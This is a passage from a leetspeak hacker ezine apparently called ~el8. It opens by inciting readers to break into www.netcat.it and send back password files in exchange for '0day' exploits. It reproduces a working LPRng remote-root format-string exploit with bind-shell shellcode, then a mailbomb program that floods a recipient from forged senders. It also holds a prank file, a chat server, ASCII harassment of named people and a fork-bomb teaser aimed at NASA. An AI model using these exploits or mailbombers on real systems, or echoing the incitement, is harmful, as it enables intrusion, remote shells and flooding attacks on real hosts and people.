(NOTE: This virus fills up NFS nodes)
See you next time! And remember, VIRII ARE FUN! :-D
[END_CUT] virus.txt
[END_DIR] misc
____________________________________
.-' `-.
[15]| SUPER K0DE R1PP1NG |[15]
[15]| by: |[15]
[15]| ~el8 |[15]
`-.____________________________________.-'
the f1rst pers0n t0 rm www.netcat.it and n0tify ~el8 0f
the rm1ng w1nz some pr1zes. rec3ntly www.netcat.it r1pped
an expl0it and p0st3d f0r themselvez 0n vuln-dev and 0n their
g4y asS s1te. h3r3 @ ~el8, we r c0nduct1ng a g4me. a c0nt3st iph
y0u w1ll. f1rst pers0n t0 rm netcat.it and n0tify uz via em4il
w1nz 2 0d4y k0dez. we w0uld lyke s0me l0gz 0f the b0x etc, th1s
w1ll b put in the n3xt ~el8. l0gz c0uld b lyke, passwd f1le,
/etc all arch1ved up etcetc. the k0untd0wn beg1nz as s00n as ~el8
h1tz the stre4tz. s0 hurry the fuk up, w4r3z aw4itz y0u. als0,
th3r3 iz n0 l1mit 0n h0w m4ny timez netcat.it iz rm'd. we als0
w1ll b accept1ng 0ther b0xez belonging t0 netcat.it being rm'd, but
th1s w1ll result in 1 0d4y k0dez, n0t 2. h4ve phun, and l3t the g4ymez
beg1n.
[BEGIN_DIR] ripped_k0dez
[CUT_HERE] rm_netcat.it.c
// bl4t4ntly r1pped fr0m an0ther expl0it
/*
*
* www.netcat.it Presents: LPRng/Linux remote root lpd exploit.
*
* NetCat.it - admin@netcat.it
*
* Please Sysadmin Patch your Box!
* Please RedHat.com, release a patch!
*
* Run: ./SEClpd victim brute -t type
* Try first ./SEClpd victim -t 0 then try the brute.
*
* This exploit can be download from www.netcat.it
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define ADDRESS_BUFFER_SIZE 32+4
#define APPEND_BUFFER_SIZE 52
#define FORMAT_LENGTH 512-8
#define NOPCOUNT 200
#define SHELLCODE_COUNT 1030
#define DELAY 50000 /* usecs */
#define OFFSET_LIMIT 5000
char shellcode[] =
"\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
struct target
{
char *os_name;
u_long eip_address;
u_long shellcode_address;
unsigned int position;
int written_bytes;
int align;
};
struct target targets[] =
{
{ "RedHat 7.0 - Guinesss ", 0xbffff3ec, 0L, 300, 70, 2, },
{ "RedHat 7.0 - Guinesss-dev", 0xbffff12c, 0L, 300, 70, 2, },
{
NULL, 0L, 0L, 0, 0, 0
}
};
static char address_buffer[ADDRESS_BUFFER_SIZE+1];
static char append_buffer[APPEND_BUFFER_SIZE+1];
static char shellcode_buffer[1024];
static char *hostname=NULL;
static int offset;
static struct hostent *he;
int type=-1;
int brute=-1, failure=1;
void calculate_rets(u_long eip_addr, u_long shellcode_addr, u_int previous, u_i
nt addr_loc)
{
int i;
unsigned int tmp = 0;
unsigned int copied = previous;
unsigned int num[4] =
{
(unsigned int) (shellcode_addr & 0x000000ff),
(unsigned int)((shellcode_addr & 0x0000ff00) >> 8),
(unsigned int)((shellcode_addr & 0x00ff0000) >> 16),
(unsigned int)((shellcode_addr & 0xff000000) >> 24)
};
memset (address_buffer, '\0', sizeof(address_buffer));
memset (append_buffer, '\0', sizeof(append_buffer));
for (i = 0; i < 4; i++)
{
while (copied > 0x100)
copied -= 0x100;
if ( (i > 0) && (num[i-1] == num[i]) )
sprintf (append_buffer+strlen(append_buffer), "%%%d$n", addr_loc+i);
else if (copied < num[i])
{
if ( (num[i] - copied) <= 10)
{
sprintf (append_buffer+strlen(append_buffer), "%.*s",
(int)(num[i] - copied), "www.netcat.it");
copied += (num[i] - copied);
sprintf (append_buffer+strlen(append_buffer), "%%%d$n", addr_loc+i)
; } else {
sprintf (append_buffer+strlen(append_buffer), "%%.%du",
num[i] - copied);
copied += (num[i] - copied);
sprintf (append_buffer+strlen(append_buffer), "%%%d$n", addr_loc+i)
; }
} else {
tmp = ((num[i] + 0x100) - copied);
sprintf (append_buffer+strlen(append_buffer), "%%.%du", tmp);
copied += ((num[i] + 0x100) - copied);
sprintf (append_buffer+strlen(append_buffer), "%%%d$n", addr_loc+i);
}
sprintf (address_buffer+strlen(address_buffer), "%c%c%c%c",
(unsigned char) ((eip_addr+i) & 0x000000ff),
(unsigned char)(((eip_addr+i) & 0x0000ff00) >> 8),
(unsigned char)(((eip_addr+i) & 0x00ff0000) >> 16),
(unsigned char)(((eip_addr+i) & 0xff000000) >> 24));
}
while (strlen(address_buffer) < ADDRESS_BUFFER_SIZE)
strcat (address_buffer, "X");
#ifdef DEBUG
printf ("\nGeneration complete:\nAddress: ");
for (i = 0; i < strlen(address_buffer); i++)
{
if ( ((i % 4) == 0) && (i > 0) )
printf (".");
printf ("%02x", (unsigned char)address_buffer[i]);
}
printf ("\nAppend: %s\n", append_buffer);
#endif
return;
}
char *create_malicious_string(void)
{
static char format_buffer[FORMAT_LENGTH+1];
long addr1,addr2;
int i;
memset (format_buffer, '\0', sizeof(format_buffer));
targets[type].shellcode_address = targets[type].eip_address + SHELLCODE
_COUNT;
addr1 = targets[type].eip_address;
addr2 = targets[type].shellcode_address;
calculate_rets (addr1, addr2,targets[type].written_bytes, targets[type].posit
ion);
(void)snprintf (format_buffer, sizeof(format_buffer)-1, "%.*s%s",
targets[type].align, "BBBB", address_buffer);
strncpy (address_buffer, format_buffer, sizeof(address_buffer)-1);
strncpy (format_buffer, append_buffer, sizeof(format_buffer)-1);
for(i = 0 ; i < NOPCOUNT ; i++)
strcat(format_buffer, "\x90");
strcat(format_buffer, shellcode);
return (format_buffer);
}
int connect_victim()
{
int sockfd, n;
struct sockaddr_in s;
fd_set fd_stat;
char buff[1024];
static char testcmd[256] = "/bin/uname -a ; id ;\r\n";
s.sin_family = AF_INET;
s.sin_port = htons (3879);
s.sin_addr.s_addr = *(u_long *)he->h_addr;
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
printf ("--- [5] Unable to create socket!\n");
printf("Exploit failed!\n");
return -1;
}
if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)
{
return -1;
}
if(brute)
printf("+++ The eip_address is 0x%x\n\n", targets[type].eip_address);
printf("- [+] shell located on %s\n", hostname);
printf("- [+] Enter Commands at will\n\n");
failure = -1;
FD_ZERO(&fd_stat);
FD_SET(sockfd, &fd_stat);
send(sockfd, testcmd, strlen(testcmd), 0);
while(1) {
FD_SET(sockfd,&fd_stat);
FD_SET(0,&fd_stat);
if(select(sockfd+1,&fd_stat,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sockfd, &fd_stat) ) {
if((n=read(sockfd,buff,sizeof(buff)))<0){
fprintf(stderr, "EOF\n");
return 2;
}
if(write(1,buff,n)<0)break;
}
if ( FD_ISSET(0, &fd_stat) ) {
if((n=read(0,buff,sizeof(buff)))<0){
fprintf(stderr,"EOF\n");
return 2;
}
if(send(sockfd,buff,n,0)<0) break;
}
}
}
void send_code(char *exploit_buffer)
{
int sockfd, n;
struct sockaddr_in s;
fd_set fd_stat;
char recv[1024];
static char testcmd[256] = "/bin/uname -a ; id ;\r\n";
s.sin_family = AF_INET;
s.sin_port = htons (515);
s.sin_addr.s_addr = *(u_long *)he->h_addr;
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
printf ("--- [5] Unable to create socket!\n");
printf("Exploit failed!\n");
exit(-1);
}
if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)
{
printf ("--- [5] Unable to connect to %s\n", hostname);
printf("Exploit failed, %s is not running LPD!\n", hostname);
exit(-1);
}
usleep(DELAY);
if(write (sockfd, exploit_buffer, strlen(exploit_buffer)) < 0)
{
printf ("Couldn't write to socket %d", sockfd);
printf ("Exploit failed\n");
exit(2);
}
close(sockfd);
connect_victim();
}
void usage(char *program)
{
int i=0;
printf("SEClpd by www.netcat.it ! \n\n");
printf("Usage: %s victim [\"brute\"] -t type [-o offset] [-a align] [-p posi
tion] [-r eip_addr] [-c shell_addr] [-w written_bytes] \n\n", program);
printf("ie: ./SEClpd localhost -t 0 For most redhat 7.0 boxes\n");
printf("ie: ./SEClpd localhost brute -t 0 For brute forcing all redhat 7.0 b
oxes\n");
printf("Types:\n\n");
while( targets[i].os_name != NULL)
printf ("[ Type %d: [ %s ]\n", i++, targets[i].os_name);
}
int main(int argc, char **argv)
{
char exploit_buffer[1024];
char *format = NULL;
int c, brutecount=0;
if(argc < 3)
{
usage(argv[0]);
return 1;
}
hostname = argv[1];
if(!strncmp(argv[2], "brute", 5)) brute = 1;
while(( c = getopt (argc, argv, "t:r:c:a:o:p:w:k"))!= EOF){
switch (c)
{
case 't':
type = atoi(optarg);
break;
case 'r':
targets[type].eip_address = strtoul(optarg, NULL, 16);
break;
case 'c':
targets[type].shellcode_address = strtoul(optarg, NULL, 16);
break;
case 'a':
targets[type].align = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
case 'p':
targets[type].position = atoi(optarg);
break;
case 'w':
targets[type].written_bytes = atoi(optarg);
break;
default:
usage(argv[0]);
return 1;
}
}
if(type < 0)
{
printf("You must specify a type!\n");
printf("example: ./SEClpd victim -t 0\n");
return -1;
}
if ( (he = gethostbyname (hostname)) == NULL)
{
herror("gethostbyname");
exit(1);
}
targets[type].shellcode_address = targets[type].eip_address + SHELLCODE_COUNT
;
printf("+++ www.netcat.it remote exploit for LPRng/lpd \n\n");
printf("+++ Exploit information\n");
printf("+++ Victim: %s\n", hostname);
printf("+++ Type: %d - %s\n", type, targets[type].os_name);
printf("+++ Eip address: 0x%x\n", targets[type].eip_address);
printf("+++ Shellcode address: 0x%x\n", targets[type].shellcode_address);
printf("+++ Position: %d\n", targets[type].position);
printf("+++ Alignment: %d\n", targets[type].align);
printf("+++ Offset %d\n", offset);
printf("\n");
printf("+++ Attacking %s with our format string\n", hostname);
if( brute > 0 )
{
printf("+++ Brute force man, relax and enjoy the ride ;>\n");
targets[type].eip_address = 0xbffffff0;
while(failure)
{
memset(exploit_buffer, '\0', sizeof(exploit_buffer));
format = create_malicious_string();
strcpy(exploit_buffer, address_buffer);
strcat(exploit_buffer, format);
strcat(exploit_buffer, "\n");
send_code(exploit_buffer);
targets[type].eip_address = 0xbffffff0 - offset;
offset+=4;
if (offset > OFFSET_LIMIT) {
printf("+++ Offset limit hit, ending brute mode ;<\n");
return -1;
}
}
}
else
format = create_malicious_string();
strcpy(exploit_buffer, address_buffer);
strcat(exploit_buffer, format);
strcat(exploit_buffer, "\n");
send_code(exploit_buffer);
printf("Argh exploit failed$#%! try brute force!\n");
return (-1);
}
/* This exploit can be download from www.netcat.it */
[END_CUT] rm_netcat.it.c
[END_DIR] ripped_k0dez
____________________________________
.-' `-.
[16]| M4IL B0MB3R |[16]
[16]| by: |[16]
[16]| tussler |[16]
`-.____________________________________.-'
[BEGIN_DIR] disturb
[CUT_HERE] mailbomb.c
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <signal.h>
char *mkfake(void)
{
char *name = (char *) calloc(1, 10);
*(name + 0) = 'A' + (lrand48() % ('Z' - 'A'));
*(name + 1) = 'a' + (lrand48() % ('z' - 'a'));
*(name + 2) = 'A' + (lrand48() % ('Z' - 'A'));
*(name + 3) = 'a' + (lrand48() % ('z' - 'a'));
*(name + 4) = 'A' + (lrand48() % ('Z' - 'A'));
*(name + 5) = 'a' + (lrand48() % ('z' - 'a'));
*(name + 6) = 'A' + (lrand48() % ('Z' - 'A'));
*(name + 7) = 'a' + (lrand48() % ('z' - 'a'));
*(name + 8) = 'A' + (lrand48() % ('Z' - 'A'));
*(name + 9) = 'a' + (lrand48() % ('z' - 'a'));
*(name + 10) = 0;
return name;
}
#define HOST 23
const char *hosts[] = {
"aol.com",
"mindspring.com",
"reality.sgi.com",
"yahoo.com",
"hotmail.com",
"2600.com",
"gay.com",
"netzero.net",
"playboy.com",
"hackphreak.com",
"b4b0.org",
"velkro.net",
"BEEP.com",
"in-addr.arpa",
"showmethemoney.com",
"mtv.com",
"bluejeans.com",
"ns.co.uk",
"the-force.net",
"starwars.com",
"sports.co.ck",
"penthouse.nf",
"sun.com"
};
const char *msg = "YOU HAVE BEEN OWNZED THANX TEW AoHELL NEW VERSION 5.0\n"
" -- You've Got Mail (m0th3rfUqR)\n\a\033[?5h\n";
int main(int argc, char **argv)
{
FILE *sockfd;
struct hostent *he;
struct sockaddr_in san;
int sock, times = 0;
void catcher(int s) {
shutdown(sock, 2);
close(sock);
fclose(sockfd);
san.sin_family = AF_INET;
san.sin_port = htons(IPPORT_SMTP);
san.sin_addr.s_addr = *((unsigned long *) he->h_addr);
memset(&san.sin_zero, 0, sizeof(san.sin_zero));
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("reconnect");
exit(-1);
}
if (connect(sock, (struct sockaddr *) &san, sizeof(san)) == -1) {
perror("reconnect");
exit(-1);
}
if ((sockfd = fdopen(sock, "w+")) == NULL) {
perror("reconnect");
exit(-1);
}
setvbuf(sockfd, (char *) 0, _IONBF, 0);
fprintf(sockfd, "HELO fukr.com\r\n");
signal(s, catcher);
}
srand48(time(0));
if (argc < 4) {
fprintf(stderr, "usage: %s [user] [address] [times]\n", argv[0]);
exit(0);
}
if ((he = gethostbyname(argv[2])) == NULL) {
herror(argv[2]);
exit(-1);
}
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
signal(SIGPIPE, catcher);
san.sin_family = AF_INET;
san.sin_port = htons(IPPORT_SMTP);
san.sin_addr.s_addr = *((unsigned long *) he->h_addr);
memset(&san.sin_zero, 0, sizeof(san.sin_zero));
if (connect(sock, (struct sockaddr *) &san, sizeof(san)) == -1) {
perror("connect()");
exit(-1);
}
if ((sockfd = fdopen(sock, "w+")) == NULL) {
perror("fdopen()");
exit(-1);
}
setvbuf(sockfd, (char *) 0, _IONBF, 0);
usleep(20000);
fprintf(sockfd, "HELO pee.com\r\n");
while (times++ < atoi(argv[3])) {
usleep(2000);
fprintf(sockfd, "MAIL FROM: %s@%s\r\n", mkfake(), hosts[lrand48() % HOST]
);
fprintf(sockfd, "MAIL FROM: %s@%s\r\n", mkfake(), hosts[lrand48() % HOST]
);
usleep(2000);
fprintf(sockfd, "RCPT TO: %s\r\n", argv[1]);
usleep(2000);
fprintf(sockfd, "DATA\r\n");
usleep(2000);
fprintf(sockfd, "%s\r\n", msg);
usleep(2000);
fprintf(sockfd, ".\r\n");
usleep(2000);
fprintf(stderr, "%i,", times);
}
usleep(200000);
fprintf(sockfd, "QUIT\r\n");
shutdown(sock, 2);
close(sock);
fclose(sockfd);
puts("done.");
return 0;
}
[END_CUT] mailbomb.c
[END_DIR] disturb
____________________________________
.-' `-.
[17]| un1x f1le m4g1c |[17]
[17]| by: |[17]
[17]| tmoL |[17]
`-.____________________________________.-'
Here I will show you a very nice trick to show at LAN
partys.
First of all, eldump this.
Then type:
$ file file_m4g1c
filemagic: ELF 32-bit LSB (FUCKYOU LAME ASS MOTHERFUCKERZ)
This will amaze your friends at the LAN party. Also, change
the message to, you have been trojaned motherfucker! This will
clearly scare the living shit out of them.
[BEGIN_DIR] file_m4g1c
[CUT_HERE] file_m4g1c
^?ELF^A^A^A^AFUCKYOU LAME ASS MOTHERFUCKERZ^A
[END_CUT] file_m4g1c
[END_DIR] file_m4g1c
____________________________________
.-' `-.
[18]| ~el8ch4t |[18]
[18]| by: |[18]
[18]| movl[~el8]. |[18]
`-.____________________________________.-'
h3r3 iz ~el8ch4t. im h0p1ng it iz a repl4cem3nt f0r the l4me
irc pr0t0c0l. itz ez t0 c0mpile, run, and add k0d3z t0. gr34tz
0ut t0 ~el8.
[BEGIN_DIR] el8ch4t
[CUT_HERE] el8ch4t.c
#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int DPORT = 31336;
#define ACCEPT_NO_CONNEX 0
#define NOCONNEX4U "n0 c0nn3cti0nz f0r y0u m0th3rfuqr, baqup\r\n"
#define NIQS1ZE 15
#define MAXINPUT 512
#define CMDCHAR /
typedef struct cHaTbuFF
{
int fd;
char niq[NIQS1ZE];
struct sockaddr_in sin;
}
chat_t;
#define MAXCH4TZ 20
chat_t gchat[MAXCH4TZ];
void
come_g1t_y0rz (void)
{
int x;
for (x = 0; x <= MAXCH4TZ; x++)
{
gchat[x].fd = -1;
bzero (&gchat[x].niq, NIQS1ZE);
}
return;
}
void
gr33t (int key, struct sockaddr_in *sin)
{
int x;
char buff[520];
memset (buff, 0, sizeof (buff));
snprintf (buff, (sizeof (buff) - 1),
"*** Everyone welcome [%s] to ~el8chat ***\r\n", gchat[key].niq);
for (x = 0; x < MAXCH4TZ; x++)
{
if (x == key)
continue; /* d0nt greet 0urs3lvez? */
if (gchat[x].fd != -1)
send (gchat[x].fd, buff, strlen (buff), 0x00);
}
return;
}
int
g3tn1q (int key)
{
char c;
int len = -1;
char hello[512];
char n1qy[] = "Enter your ~el8 nickname> ";
send (gchat[key].fd, n1qy, strlen (n1qy), 0x00);
while (1)
{
len += 1;
recv (gchat[key].fd, &c, 1, 0x00);
if (c == '\r' || c == '\n')
break;
if (len == NIQS1ZE)
break; /* haqrz no */
gchat[key].niq[len] = c;
}
if (len == 0 || len < 0)
{
send (gchat[key].fd, "Illegal nick\r\n", 15, 0x00);
return -1;
}
for (len = 0; len < MAXCH4TZ; len++)
{
if (len == key)
continue;
if (!strncasecmp
(gchat[len].niq, gchat[key].niq, strlen (gchat[key].niq)))
{
send (gchat[key].fd, "Illegal nick, already in use\r\n", 30, 0x00);
return -1;
}
}
for (len = 0; len < NIQS1ZE; len++)
if (gchat[key].niq[len] == '=')
{
send (gchat[key].fd, "Illegal char in nick, gbye\r\n", 28, 0x00);
return -1;
}
memset (hello, 0, sizeof (hello));
snprintf (hello, (sizeof (hello) - 1), "*** HEY %s!!!!!!!!!! ***\r\n",
gchat[key].niq);
send (gchat[key].fd, hello, strlen (hello), 0x00);
return 1;
}
int
g00dbye (int key, struct sockaddr_in *sin)
{
int x;
char gbYEmsg[512];
memset (gbYEmsg, 0, sizeof (gbYEmsg));
snprintf (gbYEmsg, sizeof (gbYEmsg) - 1,
"*** [%s] has left the building ***\r\n", gchat[key].niq);
for (x = 0; x < MAXCH4TZ; x++)
{
if (x == key)
{
write (gchat[key].fd, "*** CYA !!!!!!!!!!!!!!! ***\r\n", 29);
continue;
}
else if (gchat[x].fd != -1)
{
send (gchat[x].fd, gbYEmsg, strlen (gbYEmsg), 0x00);
}
}
shutdown (gchat[key].fd, 2);
close (gchat[key].fd);
gchat[key].fd = -1;
bzero (&gchat[key].niq, sizeof (gchat[key].niq));
return 1;
}
int
w4ll (int key, char *buff)
{
char urniq[] = "=", format[MAXINPUT + NIQS1ZE + 1];
int x;
for (x = 0; x < MAXCH4TZ; x++)
{
if (x == key) /* ur s3lf */
{
bzero (&format, sizeof (format));
snprintf (format, (sizeof (format) - 1), "<%s> %s\r\n", urniq,
buff);
send (gchat[key].fd, format, strlen (format), 0x00);
continue;
}
if (gchat[x].fd != -1)
{
bzero (&format, sizeof (format));
snprintf (format, (sizeof (format) - 1), "<%s> %s\r\n",
gchat[key].niq, buff);
send (gchat[x].fd, format, strlen (format), 0x00);
}
}
return 1;
}
/* c0mm4nd */
int
do_cmd_msg (int key, struct sockaddr *sin, char *msg)
{
return 1;
}
int
do_cmd_who (int key, char *buff)
{
int x;
char hold[255];
if (buff == '\0')
{
send (gchat[key].fd, "BCMD:2\r\n", 8, 0x00);
for (x = 0; x < MAXCH4TZ; x++)
{
if (gchat[x].fd == -1)
continue;
bzero (&hold, sizeof (hold));
snprintf (hold, sizeof (hold) - 1, "%s@%s\r\n", gchat[x].niq,
inet_ntoa (gchat[x].sin.sin_addr));
send (gchat[key].fd, hold, strlen (hold), 0x00);
}
send (gchat[key].fd, "ECMD:2\r\n", 8, 0x00);
}
return 1;
}
int
s3rv_U (int key, int fd, struct sockaddr_in *sin)
{
char buff[MAXINPUT];
int n;
if (g3tn1q (key) < 0)
{
g00dbye (key, sin);
}
gr33t (key, sin);
while (31337)
{
bzero (&buff, sizeof (buff));
n = recv (gchat[key].fd, buff, (sizeof (buff) - 1), 0x00);
if (n > MAXINPUT)
{
printf
("WTF , N IZ %i and MAXINPUT IZ %i, REINSTALL Y0R OS ITS FUKT!!!!!!
\n",
n, MAXINPUT);
}
if (buff[0] == '/')
{ /* command shit */
if (!strncasecmp (&buff[1], "quit", 4))
{
g00dbye (key, sin);
return 1;
}
if (!strncasecmp (&buff[1], "who", 3))
{
do_cmd_who (key, '\0');
continue;
}
if (!strncasecmp (&buff[1], "msg", 3))
{
//do_cmd_msg(key, sin, buff);
continue;
}
continue;
}
else
{
w4ll (key, buff);
}
}
g00dbye (key, sin);
return 1;
}
int
main (int argc, char *argv[])
{
int sfd, nfd, sfromlen, key;
struct sockaddr_in sin, sfrom;
bzero (&sin, sizeof (sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
come_g1t_y0rz ();
sfd = socket (AF_INET, SOCK_STREAM, 0);
if (sfd < 0)
{
perror ("socket");
exit (-1);
}
nfd = -1;
while (nfd == -1)
{
DPORT += 1;
sin.sin_port = htons (DPORT);
nfd = bind (sfd, (struct sockaddr *) &sin, sizeof (sin));
}
nfd = 0;
printf ("p0rt t0 c0nn3ct t0 = %i\n", DPORT);
if (listen (sfd, MAXCH4TZ) < 0)
{
perror ("listen");
exit (-1);
}
sfromlen = sizeof (struct sockaddr_in);
while (31337)
{
if ((nfd = accept (sfd, &sfrom, &sfromlen)) < 0)
{
perror ("acc3pt");
continue;
}
printf ("c0nn3cti0n fr0m %s\n", inet_ntoa (sfrom.sin_addr));
if (ACCEPT_NO_CONNEX)
{
write (nfd, NOCONNEX4U, strlen (NOCONNEX4U));
close (nfd);
continue;
}
for (key = 0; key < MAXCH4TZ; key++)
if (gchat[key].fd == -1)
break;
if (key == MAXCH4TZ)
{
printf ("p0ssible pr0blem\n");
continue;
}
else
{
gchat[key].fd = nfd;
gchat[key].sin = sfrom;
}
switch (fork ())
{
case 0:
s3rv_U (key, nfd, &sfrom);
//exit (31337);
break;
case -1:
/* p0ssible f0rkb0mb att4x, we sh0uld ex1t */
puts ("W3'R3 B3ING ATT4CKT!!!!!!!!!!!!!!!!!!!!!!!!!");
exit (-1);
break;
default:
/* i think i hafto close nfd!?!? */
//close(nfd);
break;
}
}
return 31337;
}
[END_CUT] el8ch4t.c
[END_DIR] el8ch4t
____________________________________
.-' `-.
[19]| s1lly m4kr0z |[19]
[19]| by: |[19]
[19]| v4ri0uz du0d |[19]
`-.____________________________________.-'
y0u k4n p4st3 th3z int0 y0r ph4v0r1t3 irc ch4nn3l. u k4n
ev3n p4st3 them 0n bugtr4q, usen1x etc. als0, u k4n ch4ng3 the
s4y1ngz t0 wh4t3v3r u lyke, p1ss 0ff u phr1endz, p1ss 0ff ur
k0us1n, p1ss 0ff s0m1 u h8!
[BEGIN_DIR] misc
[CUT_HERE] m4kr0z.mac
[-------->^BScRoLLeR^B<-]
[------->^BScRoLLeR^B<--]
[------>^BScRoLLeR^B<---]
[----->^BScRoLLeR^B<----]
[---->^BScRoLLeR^B<-----]
[--->^BScRoLLeR^B<------]
[-->^BScRoLLeR^B<-------]
[->^BScRoLLeR^B<--------]
[-->^BScRoLLeR^B<-------]
[--->^BScRoLLeR^B<------]
[---->^BScRoLLeR^B<-----]
[----->^BScRoLLeR^B<----]
[------>^BScRoLLeR^B<---]
[------->^BScRoLLeR^B<--]
[-------->^BScRoLLeR^B<-]
.-------------.
| h0nK! h0nK! |
._____ ______,
.----------------. '/
BRONC 0ff --> |_I_I_I_I_I_I_I_I]___
t3w --> .::. | _ sh0rt bUz: ; _ )
sk00l --> ':::'' ='-(_)----------=-(_)-'
\\\\
\c .( <= ALEPH1 RUNN1N FR0M
\ _/ <= TH3 SPA
___/( /(
/--/ \\//
__ )/ /\/ \/
-.\ //\\
\\// \\
\/ \\
\\
'--
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\
I:
| O F F I C I A L :I
I: | W4R3Z K1D LICENSE :I
I: //-'`\ | <-><-><-><-><-><-><-><-><-><-> :I
I: ;/ _ _ \; | :I
I: ; `* *` | | Name: Bronc Buster :I
I: | ^ ; | Email: bronc@attrition.org :I
I: \ '-=-' / | URL: www.legions.com :I
I: ;.___.; | :I
I: ) ( | Home: #!gay :I
I: .- `-...-` -. | :I
I: /` `\ | :I
I: / \ | :I
*_____________________|________________________________*
,_ _,
(`\`'--""--'`/`)
) `'. .'` (
/ .-\ /-. \
| ( 0 \/ 0 ) | << H0W M4NNY L1X T0 TH3
| '-'/\'-' | << C3NT3R 0F 4 T00TS13
\ /\/\ / << R0LL P0P ?!?!?
;--' '--;
/`.',_.._..,'.`\
/ ; ; \
| ; '-'--'-'-' ; |
| ,'--.___.--'-, |
| . ._ _. . |
\ ; ''--'` ; /
\/\.`-._._.-'/\/
`;__ __;'
///)```(\\\
(((/ \)))
_ _..._ _
.' ) (` '.
| / `\ |
\_| q p |\_/
\ Y /--..-="````"-.
`.=__.-` `\
o\ \-`
| | <- 41M H3R3, BR0NC
\ .--""`\ <
// | || |
((,,_/ ((,,___/
,-~-, ,-~~~~-, /\ /\
(\ / ,-, \ ,' ', / ~~ \
\'-' / \ \ / _ # <0 0> \
'--' \ \/ .' '. # = Y =/
\ / \ \ `#-..O.-'
Y3T 4N0TH3R >> \ \ \ `\ \\
V1CT1M 0F >> ) /> / \ \\
BRONC >> / /`/ /`__ \ \\__
(____)))_))) \__)))
.-.
|-|
| | <- R0uTEZ R3SP0NS3 4G41NST
_.-|=|-. <- 4LL3G4T10NZ FR0M
/ | | | | <- MS. L3W1NSKY
| |\
| /
\ /`
.:\:/:.
.:\:\:/:/:.
:.:\:\:/:/:.:
:=.' - - '.=:
'=(\ 9 9 /)='
( (_) ) <= J1MMY TH4 W4R3Z TR0LL
/`-vvv-'\
/ juarez! \
/ /|,,,,,|\ \
/_// /^\ \\_\
WW( ( ) )WW
__\,,\ /,,/__
(______Y______)
_.="""=._
/` \ / `\
/ / _} {_ \ \
/ ; /o) (o\ ; \
\ | / _ \ | /
\_/\| (_) |/\_/
/`\_/=\_/`\ RL0xL3Y S4YZ:
/` `"` `\ "G3T Y0R D0G 0R C4T SP4Y3D 0R N3UT3R3D"
{ }
_.._
.'/'._`'.
/.' '-.\
( 0 0 )
\ ^ /
'.'---'.'
`) (` W3LL, J00 KN0 MY N4M3 IZ S1M0N
.--'._.'--. 4ND 1 L1K3 T3W D3W DR4W1NGZ
/ \
/ /| |\ \
/ / | | \ \
(\_/ |_____| \_/)
.-.
__ _| '-----------._____________.-'\
`-.`\,' .======. \ ===== ======= \==.
__.' || (___|- = = |----------------| |
/ ,_ || ___| - - -|________________/ |
/ / / || (___| = = =|________________)=='
| (_/ '======'_-- -/
/ (_II== /
| .---. ___/
/ ::. .--. /\ / |(
| .::::. / \\ \( //
/ .:::::: | '-----'
; :::::::: |
| :::::::: | ~eL8 S3YZ: "M4K3 L0V3, N0T W4R!"
|::::::::: |
/::::::::: |
'-----------'
(\
\\
))
//
.-. // .-.
/ \-((=-/ \
\ \\ /
`( ____))_ )`
.-' // '-.
/ (( \
| ! | [ D0NT G3T T00 3XC1T3D, BR0NC ]
\ /
\ |___| /
_) \ / (_
(((---' '---)))
.-""""-. .-""""-.
/ \ / \
/_ _\ /_ _\
// \ / \\ // \ / \\
|\__\ /__/| |\__\ /__/|
\ || / \ || /
\ / \ /
\ __ / \ __ /
'.__.' '.__.'
| | | |
| | | |
T4K3 UZ t0 Y0UR K0UR13R
_.---._
_.-{_O___O_} _.---._
}_.'` `'. ,_.-(_O___O_)
( (`-.___.-`) ) )_.'_ _'.
'.`"-----"`.' ( (_`---`_) ) r4f43l 1z c00l, bUt rUd3,
`'-----'` '._`"""`_.' m1ch43l4ng3l0 1z 4 p4rty d00d
`"""`_.---._
_.---,_ ,__.-(_a___a_)
_.-(_o___o_) }_.'_ _'.
}_.'_ _'. ( ( `.___.` ) )
( (_`---`_) ) '.`"-'''-"`.'
'._`````_.' `'-----'`
`"""`
[END_CUT] m4kr0z.mac
[END_DIR] misc
____________________________________
.-' `-.
[20]| qu1k3st f0rkb0mb in the w3st |[20]
[20]| by: |[20]
[20]| movl |[20]
`-.____________________________________.-'
us3 th1z t0 cr4sh n4s4.
[BEGIN_DIR] disturb
